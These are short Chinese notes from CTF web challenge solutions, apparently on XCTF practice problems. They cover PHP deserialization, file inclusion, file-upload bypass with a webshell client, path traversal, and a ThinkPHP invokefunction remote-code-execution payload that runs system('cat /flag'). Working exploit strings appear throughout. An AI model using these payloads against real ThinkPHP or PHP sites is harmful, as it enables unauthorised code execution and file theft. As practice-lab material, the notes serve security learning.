unserialize3
需要反序列化一下:O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
php_rce
題目提示rce漏洞,測試一下:?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
flag:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
Web_php_include
show_source(__FILE__);
show_source()是 PHP 的內置函數,其作用是讀取并高亮顯示指定文件的源代碼
__FILE__是 PHP 的魔術常量,代表當前正在執行的腳本文件的完整路徑和文件名。所以這行代碼的功能是顯示當前 PHP 文件的源代碼echo $_GET['hello'];
$_GET是 PHP 的一個超全局變量,用于獲取通過GET請求方法傳遞的參數
這行代碼會輸出GET請求中名為hello的參數的值$page=$_GET['page'];
此代碼將GET請求中名為page的參數的值賦給變量$pagewhile (strstr($page, "php://")) {$page=str_replace("php://", "", $page);
}
strstr()是 PHP 的內置函數,用于查找字符串在另一個字符串中首次出現的位置。若找到,則返回從該位置開始到字符串結尾的部分;若未找到,則返回false
str_replace()也是 PHP 的內置函數,用于將字符串中的指定子字符串替換為另一個字符串
這部分代碼運用while循環持續檢查$page變量中是否包含php://字符串,若包含則將其替換為空字符串,直至$page中不再包含php://include($page);
include()是 PHP 的內置函數,用于包含并執行指定的文件
這行代碼嘗試包含并執行$page變量所指定的文件
flag
upload1
要jpg和png后綴
上傳以后修改為php后綴
用蟻劍連接找到flag
warmup
查看一下/source.php
看一下/hint.php
/?file=hint.php?/…/…/…/…/ffffllllaaaagggg